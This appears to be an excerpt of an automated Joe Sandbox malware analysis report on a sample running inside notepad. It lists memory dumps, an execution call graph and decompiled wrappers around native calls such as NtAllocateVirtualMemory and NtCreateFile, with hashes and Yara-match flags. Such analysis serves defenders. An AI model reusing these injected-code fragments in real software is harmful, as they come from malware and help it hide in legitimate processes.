                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.950546902.0000000000870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_870000_Client.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4b01891ddb6c702828acd71fe15e61a385fe124875a050a7d27a8e8d783df6b6
                                                  • Instruction ID: 8570c9ba71236b8b1d102b31bcbd054bb5b044d9b3fc5a98ae7a9b1a62835a1b
                                                  • Opcode Fuzzy Hash: 4b01891ddb6c702828acd71fe15e61a385fe124875a050a7d27a8e8d783df6b6
                                                  • Instruction Fuzzy Hash: 3BF02439B04068CB83089768E9448567BABEBCB211319D07AD50A9B79DCF31DC018790
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.949944018.00000000004E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
Execution Graph

Execution Coverage: 2%
Dynamic/Decrypted Code Coverage: 2.4%
Signature Coverage: 0.7%
Total number of Nodes: 546
Total number of Limit Nodes: 68
69456->69457 69458 41ac30 LdrLoadDll 69457->69458 69459 41aeb3 69458->69459 69460 41ac30 LdrLoadDll 69459->69460 69461 41aebc 69460->69461 69462 41ac30 LdrLoadDll 69461->69462 69463 41aec5 69462->69463 69464 41ac30 LdrLoadDll 69463->69464 69465 41aece 69464->69465 69466 41ac30 LdrLoadDll 69465->69466 69467 41aeda 69466->69467 69468 41ac30 LdrLoadDll 69467->69468 69469 41aee3 69468->69469 69470 41ac30 LdrLoadDll 69469->69470 69471 41aeec 69470->69471 69471->69257 69473 41af60 LdrLoadDll 69472->69473 69474 419edc 69473->69474 69503 a9fdc0 LdrInitializeThunk 69474->69503 69475 419ef3 69475->69177 69477->69254 69479 41af60 LdrLoadDll 69478->69479 69480 41a55c NtAllocateVirtualMemory 69479->69480 69480->69356 69482 41cf40 69481->69482 69483 41cf46 69481->69483 69482->69362 69484 41bf90 2 API calls 69483->69484 69485 41cf6c 69484->69485 69485->69362 69487 41cff5 69486->69487 69488 41d02d 69486->69488 69489 41bf90 2 API calls 69487->69489 69488->69366 69490 41d00a 69489->69490 69491 41bdc0 2 API calls 69490->69491 69491->69488 69492->69374 69493->69376 69494->69378 69495->69380 69496->69382 69498 41ac4b 69497->69498 69499 414e50 LdrLoadDll 69498->69499 69500 41ac6b 69499->69500 69501 414e50 LdrLoadDll 69500->69501 69502 41ad17 69500->69502 69501->69502 69502->69396 69503->69475 69504->69263 69506 41af60 LdrLoadDll 69505->69506 69507 41a68c RtlFreeHeap 69506->69507 69507->69267 69509 407eb0 69508->69509 69510 407eab 69508->69510 69511 41bd40 2 API calls 69509->69511 69510->69185 69514 407ed5 69511->69514 69512 407f38 69512->69185 69513 419ec0 2 API calls 69513->69514 69514->69512 69514->69513 69516 407f3e 69514->69516 69519 41bd40 2 API calls 69514->69519 69524 41a5c0 69514->69524 69517 407f64 69516->69517 69518 41a5c0 2 API calls 69516->69518 69517->69185 69520 407f55 69518->69520 69519->69514 69520->69185 69522 40817e 69521->69522 69523 41a5c0 2 API calls 69521->69523 69522->69146 69523->69522 69525 41af60 LdrLoadDll 69524->69525 69526 41a5dc 69525->69526 69529 a9fb68 
LdrInitializeThunk 69526->69529 69527 41a5f3 69527->69514 69529->69527 69531 41b5c3 69530->69531 69534 40acf0 69531->69534 69535 40ad14 69534->69535 69536 40ad50 LdrLoadDll 69535->69536 69537 409c4a 69535->69537 69536->69537 69537->69152 69539 40b054 69538->69539 69540 40b0e0 69539->69540 69554 419c90 LdrLoadDll 69539->69554 69540->69159 69543 41af60 LdrLoadDll 69542->69543 69544 40f1bb 69543->69544 69544->69167 69545 41a7d0 69544->69545 69546 41a7dd 69545->69546 69547 41af60 LdrLoadDll 69546->69547 69548 41a7ef LookupPrivilegeValueW 69547->69548 69548->69163 69550 41a27c 69549->69550 69551 41af60 LdrLoadDll 69549->69551 69555 a9fed0 LdrInitializeThunk 69550->69555 69551->69550 69552 41a29b 69552->69164 69554->69540 69555->69552 69557 40b1f0 69556->69557 69558 40b040 LdrLoadDll 69557->69558 69559 40b204 69558->69559 69559->69101 69561 40ae51 69560->69561 69562 40ae4d 69560->69562 69563 40ae9c 69561->69563 69565 40ae6a 69561->69565 69562->69104 69607 419cd0 LdrLoadDll 69563->69607 69606 419cd0 LdrLoadDll 69565->69606 69566 40aead 69566->69104 69568 40ae8c 69568->69104 69570 40f4a0 3 API calls 69569->69570 69571 4143c6 69569->69571 69570->69571 69571->69106 69573 408a79 69572->69573 69608 4087a0 69572->69608 69575 4087a0 19 API calls 69573->69575 69578 408a9d 69573->69578 69576 408a8a 69575->69576 69576->69578 69626 40f710 10 API calls 69576->69626 69578->69108 69580 41af60 LdrLoadDll 69579->69580 69581 41a51c 69580->69581 69745 a9fea0 LdrInitializeThunk 69581->69745 69582 40c322 69584 40f4a0 69582->69584 69585 40f4bd 69584->69585 69746 419fc0 69585->69746 69588 40f505 69588->69112 69589 41a010 2 API calls 69590 40f52e 69589->69590 69590->69112 69592 41a02c 69591->69592 69593 41af60 LdrLoadDll 69591->69593 69752 a9fc60 LdrInitializeThunk 69592->69752 69593->69592 69594 40c385 69594->69118 69594->69121 69597 41af60 LdrLoadDll 69596->69597 69598 41a07c 69597->69598 69753 a9fc90 LdrInitializeThunk 69598->69753 69599 40c459 69599->69129 69602 41af60 LdrLoadDll 
69601->69602 69603 419e3c 69602->69603 69754 aa0078 LdrInitializeThunk 69603->69754 69604 40c4ac 69604->69133 69606->69568 69607->69566 69609 407ea0 4 API calls 69608->69609 69624 4087ba 69609->69624 69610 408a49 69610->69573 69611 408a3f 69612 408160 2 API calls 69611->69612 69612->69610 69615 419f00 2 API calls 69615->69624 69617 41a490 LdrLoadDll NtClose 69617->69624 69620 40c4c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 69620->69624 69623 419e20 2 API calls 69623->69624 69624->69610 69624->69611 69624->69615 69624->69617 69624->69620 69624->69623 69627 419d10 69624->69627 69630 4085d0 69624->69630 69642 40f5f0 LdrLoadDll NtClose 69624->69642 69643 419d90 LdrLoadDll 69624->69643 69644 419dc0 LdrLoadDll 69624->69644 69645 419e50 LdrLoadDll 69624->69645 69646 4083a0 69624->69646 69662 405f60 LdrLoadDll 69624->69662 69626->69578 69628 419d2c 69627->69628 69629 41af60 LdrLoadDll 69627->69629 69628->69624 69629->69628 69631 4085e6 69630->69631 69663 419880 69631->69663 69633 4085ff 69638 408771 69633->69638 69684 4081a0 69633->69684 69635 4086e5 69636 4083a0 11 API calls 69635->69636 69635->69638 69637 408713 69636->69637 69637->69638 69639 419f00 2 API calls 69637->69639 69638->69624 69640 408748 69639->69640 69640->69638 69641 41a500 2 API calls 69640->69641 69641->69638 69642->69624 69643->69624 69644->69624 69645->69624 69647 4083c9 69646->69647 69724 408310 69647->69724 69650 4083dc 69651 41a500 2 API calls 69650->69651 69652 408467 69650->69652 69654 408462 69650->69654 69732 40f670 69650->69732 69651->69650 69652->69624 69653 41a490 2 API calls 69655 40849a 69653->69655 69654->69653 69655->69652 69656 419d10 LdrLoadDll 69655->69656 69657 4084ff 69656->69657 69657->69652 69736 419d50 69657->69736 69659 408563 69659->69652 69660 414a50 8 API calls 69659->69660 69661 4085b8 69660->69661 69661->69624 69662->69624 69664 41bf90 2 API calls 69663->69664 69665 419897 69664->69665 69691 409310 69665->69691 69667 4198b2 69668 4198f0 
69667->69668 69669 4198d9 69667->69669 69672 41bd40 2 API calls 69668->69672 69670 41bdc0 2 API calls 69669->69670 69671 4198e6 69670->69671 69671->69633 69673 41992a 69672->69673 69674 41bd40 2 API calls 69673->69674 69675 419943 69674->69675 69681 419be4 69675->69681 69697 41bd80 69675->69697 69678 419bd0 69679 41bdc0 2 API calls 69678->69679 69680 419bda 69679->69680 69680->69633 69682 41bdc0 2 API calls 69681->69682 69683 419c39 69682->69683 69683->69633 69685 40829f 69684->69685 69686 4081b5 69684->69686 69685->69635 69686->69685 69687 414a50 8 API calls 69686->69687 69688 408222 69687->69688 69689 41bdc0 2 API calls 69688->69689 69690 408249 69688->69690 69689->69690 69690->69635 69692 409335 69691->69692 69693 40acf0 LdrLoadDll 69692->69693 69694 409368 69693->69694 69696 40938d 69694->69696 69700 40cf20 69694->69700 69696->69667 69718 41a580 69697->69718 69701 40cf4c 69700->69701 69702 41a1e0 LdrLoadDll 69701->69702 69703 40cf65 69702->69703 69704 40cf6c 69703->69704 69711 41a220 69703->69711 69704->69696 69708 40cfa7 69709 41a490 2 API calls 69708->69709 69710 40cfca 69709->69710 69710->69696 69712 41a23c 69711->69712 69713 41af60 LdrLoadDll 69711->69713 69717 a9fbb8 LdrInitializeThunk 69712->69717 69713->69712 69714 40cf8f 69714->69704 69716 41a810 LdrLoadDll 69714->69716 69716->69708 69717->69714 69719 41af60 LdrLoadDll 69718->69719 69720 41a59c 69719->69720 69723 aa0048 LdrInitializeThunk 69720->69723 69721 419bc9 69721->69678 69721->69681 69723->69721 69725 408328 69724->69725 69726 40acf0 LdrLoadDll 69725->69726 69727 408343 69726->69727 69728 414e50 LdrLoadDll 69727->69728 69729 408353 69728->69729 69730 40835c PostThreadMessageW 69729->69730 69731 408370 69729->69731 69730->69731 69731->69650 69733 40f683 69732->69733 69739 419e90 69733->69739 69737 41af60 LdrLoadDll 69736->69737 69738 419d6c 69737->69738 69738->69659 69740 419eac 69739->69740 69741 41af60 LdrLoadDll 69739->69741 69744 a9fd8c LdrInitializeThunk 69740->69744 69741->69740 69742 40f6ae 
69742->69650 69744->69742 69745->69582 69747 41af60 LdrLoadDll 69746->69747 69748 419fdc 69747->69748 69751 a9ffb4 LdrInitializeThunk 69748->69751 69749 40f4fe 69749->69588 69749->69589 69751->69749 69752->69594 69753->69599 69754->69604 69757 a9f900 LdrInitializeThunk

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 41a40a-41a459 call 41af60 NtReadFile
                                                  APIs
                                                  • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID: 1JA$rMA$rMA
                                                  • API String ID: 2738559852-782607585
                                                  • Opcode ID: d2b46f34e5410bcccec3f92e10d19bae3ee94de036172622466af87796f5b362
                                                  • Instruction ID: 6c02d1606e77c17e30eebbb36dc145a13db086e6251de5938a5ec31c92b5f07b
                                                  • Opcode Fuzzy Hash: d2b46f34e5410bcccec3f92e10d19bae3ee94de036172622466af87796f5b362
                                                  • Instruction Fuzzy Hash: DDF0E2B2200208AFCB14DF99DC80EEB77A9EF8C714F158248BA1DA7241D630E911CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 3 41a410-41a426 4 41a42c-41a459 NtReadFile 3->4 5 41a427 call 41af60 3->5 5->4
                                                  APIs
                                                  • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID: 1JA$rMA$rMA
                                                  • API String ID: 2738559852-782607585
                                                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                  • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                  • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 239 41a35a-41a3b1 call 41af60 NtCreateFile
                                                  C-Code - Quality: 100%
                                                  			E0041A35A(void* __eax, void* __edx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                  				long _t22;
                                                  				void* _t34;
                                                  				void* _t35;
                                                  
                                                  				_t3 = _a4 + 0xc40; // 0xc40
                                                  				E0041AF60(_t34, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28, _t35);
                                                  				_t22 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                  				return _t22;
                                                  			}

                                                  0x0041a36f
                                                  0x0041a377
                                                  0x0041a3ad
                                                  0x0041a3b1

                                                  APIs
                                                  • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: e2beb997412d6611f8a4f38b4e921343df11394e3f7af8fcb5cd2edd6e933a0a
                                                  • Instruction ID: e97ca016152ee39ed1797b360af78b315a466cae45add44f3bb0aad21ad5bc4a
                                                  • Opcode Fuzzy Hash: e2beb997412d6611f8a4f38b4e921343df11394e3f7af8fcb5cd2edd6e933a0a
                                                  • Instruction Fuzzy Hash: 63F0BDB2205108AFCB08CF98DC84EEB37AABF8C754F158648FA0DD7241C630E8518BA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 242 41a360-41a376 243 41a37c-41a3b1 NtCreateFile 242->243 244 41a377 call 41af60 242->244 244->243
                                                  APIs
                                                  • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                  • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                                  • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                  • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 253 41a53c-41a556 254 41a55c-41a57d NtAllocateVirtualMemory 253->254 255 41a557 call 41af60 253->255 255->254
                                                  C-Code - Quality: 75%
                                                  			E0041A53C(void* __eax, void* __ebx, void* __esi, void* _a4, PVOID* _a8, long _a12, long* _a16, long _a20, long _a24) {
                                                  				intOrPtr _v0;
                                                  				long _t16;
                                                  				void* _t25;
                                                  
                                                  				asm("aas");
                                                  				_t4 = _v0 + 0xc60; // 0xca0
                                                  				E0041AF60(_t25, _v0, _t4,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x30, __esi);
                                                  				_t16 = NtAllocateVirtualMemory(_a4, _a8, _a12, _a16, _a20, _a24); // executed
                                                  				return _t16;
                                                  			}

                                                  0x0041a53c
                                                  0x0041a54f
                                                  0x0041a557
                                                  0x0041a579
                                                  0x0041a57d

                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: c2df2180edf46e93e029bc560a7b7d18c24963d4ca06b3712f0d85bf5cccb2a3
                                                  • Instruction ID: acb896d2f926072369a8a7bb46dc4a7ee746dd0f3787bf82f06fd5323affd546
                                                  • Opcode Fuzzy Hash: c2df2180edf46e93e029bc560a7b7d18c24963d4ca06b3712f0d85bf5cccb2a3
                                                  • Instruction Fuzzy Hash: 15F0F2B6200208ABCB14DF99DC81EEB77ADAF8C654F158549BE5997242C631E911CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 256 41a540-41a57d call 41af60 NtAllocateVirtualMemory
                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                  • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                                  • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                  • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 82%
                                                  			E0041A48F(intOrPtr _a4, void* _a8) {
                                                  				long _t8;
                                                  				void* _t11;
                                                  				void* _t12;
                                                  
                                                  				asm("adc [ebp-0x75], edx");
                                                  				_t5 = _a4;
                                                  				_t2 = _t5 + 0x10; // 0x300
                                                  				_t3 = _t5 + 0xc50; // 0x40a943
                                                  				E0041AF60(_t11, _a4, _t3,  *_t2, 0, 0x2c, _t12);
                                                  				_t8 = NtClose(_a8); // executed
                                                  				return _t8;
                                                  			}

                                                  0x0041a48f
                                                  0x0041a493
                                                  0x0041a496
                                                  0x0041a49f
                                                  0x0041a4a7
                                                  0x0041a4b5
                                                  0x0041a4b9

                                                  APIs
                                                  • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: c7bf09651163799e5d87b762f5c6b9a9a51a6c43893c55ed95e77720321bc510
                                                  • Instruction ID: aa8bf0814a003d25423f0b83a14965536f6cb2bfaa386fa8c0f40121678e8937
                                                  • Opcode Fuzzy Hash: c7bf09651163799e5d87b762f5c6b9a9a51a6c43893c55ed95e77720321bc510
                                                  • Instruction Fuzzy Hash: 5CE0C271600204BFD710DFA4CC45EEB7B78EF48360F14805AF90C9B242C130E5008B90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                  • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                                  • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                  • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045620887.0000000000B80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045707273.0000000000B84000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045725616.0000000000B87000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045738115.0000000000B90000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1046306994.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_a80000_notepad.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.1044571883.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A80000, based on PE: true
                                                  • Associated: 00000009.00000002.1044557902.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000009.00000002.1045598601.0000000000B70000.00000040.00000800.00020000.00000000.sdmp
